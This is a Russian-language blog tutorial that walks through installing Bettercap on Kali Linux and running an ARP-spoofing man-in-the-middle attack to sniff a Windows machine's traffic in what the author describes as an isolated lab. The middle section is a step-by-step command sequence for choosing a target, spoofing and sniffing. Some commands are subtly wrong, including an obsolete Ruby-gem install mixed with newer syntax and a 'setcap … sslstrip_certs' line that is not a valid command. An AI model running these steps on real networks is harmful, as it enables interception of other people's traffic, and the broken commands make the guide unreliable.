Содержание
Bettercap часто используется для атаки «человек посередине» (MITM). В этой статье покажу, как использовать Bettercap для перехвата сетевого трафика на Kali Linux.
Еще по теме: Использование Airgeddon для взлома WiFi
Что такое Bettercap
Bettercap — это мощный инструмент для тестирования на проникновение и выполнения атак в сети. Это можно сказать обновленный Ettercap.
Основные возможности:
- Перехват и анализ сетевого трафика.
- Атаки на протоколы (ARP spoofing, DNS spoofing, SSLstripping и другие).
- Модификация трафика в реальном времени.
- Работа со скриптами для автоматизации задач и расширения функциональности.
- Визуализация и мониторинг сети.
Установка и использование Bettercap для перехвата трафика
Этот проект проводился в моей изолированной, безопасной и контролируемой виртуальной среде. Машина, которую я буду использовать для запуска атаки, будет Kali Linux, а целью будет Windows 10 с IP-адресом 10.60.0.10.
Установка Bettercap
Bettercap уже установлен в Kali Linux по умолчанию, но если вы используете урезанную версию, то вот как установить Bettercap на Kali Linux.
Перед началом установки лучше всего обновить систему Kali Linux. Откройте терминал и выполните команду:
|
1 |
sudo apt update && sudo apt upgrade |
Bettercap требует некоторых зависимостей для корректной работы:
|
1 |
sudo apt install build-essential ruby-dev libpcap-dev |
Теперь можно приступить к установке Bettercap. Выполните команды:
|
1 2 |
sudo gem install bettercap sudo bettercap -eval "caplets.update; q" |
Первая команда установит Bettercap с помощью менеджера пакетов RubyGem. Вторая команда запустит Bettercap и обновит список caplet (скриптов) для использования.
В некоторых случаях для полноценной работы Bettercap могут потребоваться дополнительные компоненты. Например, для перехвата HTTPS-трафика может потребоваться установка сертификата Bettercap CA. Выполните следующую команду для установки сертификата:
|
1 |
sudo bettercap -eval "setcap web.ui.http.sslstrip_certs /usr/local/bin/bettercap" |
Чтобы убедиться, что установка прошла успешно, выполните команду:
|
1 |
bettercap -h |
Вы должны увидеть справку Bettercap.
Использование Bettercap на Kali Linux
Как пользователь root, выполните команду:
|
1 |
bettercap |
Чтобы найти все хосты, выполните команду:
|
1 |
net.probe on |
Отобразите список всех хостов в сети:
|
1 |
net.show |
В моем случае целевой IP-адрес Windows — 10 10.60.0.10.
Как только цель будет идентифицирована, можно запускать ARP-атаку для перехвата трафика.
Установите цель:
|
1 |
set arp.spoof.targets 10.60.0.10 |
Запустите спуфинг:
|
1 |
arp.spoof on |
Запустите сниффинг:
|
1 |
net.sniff on |
Откройте браузер целевого компьютера (в моем случае — Windows) и откройте какие-нибудь сайты.
Теперь, когда вернетесь на Kali Linux, увидите, как Bettercap перехватывает все действия целевой машины.
PTR query (запрос PTR) относится к определенному типу DNS-запроса, который называется запросом Pointer Record (Запись указателя). DNS — это система, которая переводит удобочитаемые доменные имена (например, site.ru) в IP-адреса (например, 192.0.2.1), понятные компьютерам.
Другими словами, в то время как обычный поиск DNS преобразует доменное имя в IP-адрес, PTR query делает обратное, преобразуя IP-адрес в доменное имя.
Заключение
В зависимости от конфигурации и безопасности сети, некоторые функции Bettercap могут быть блокированы или не работать корректно. Например, использование SSLstripping может быть затруднено в случае использования HSTS (HTTP Strict Transport Security).
Достоинства Bettercap:
- Гибкость и настраиваемость.
- Активное сообщество и поддержка.
Недостатки Bettercap:
- Может быть сложным для новичков.
Важно использовать Bettercap с осознанием и соблюдением принципов этичного хакинга и законности.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Анализ трафика с помощью сканера ZUI
- Перехват трафика в локальной сети по проводу
- Анализ трафика с помощью PcapXray на Kali Linux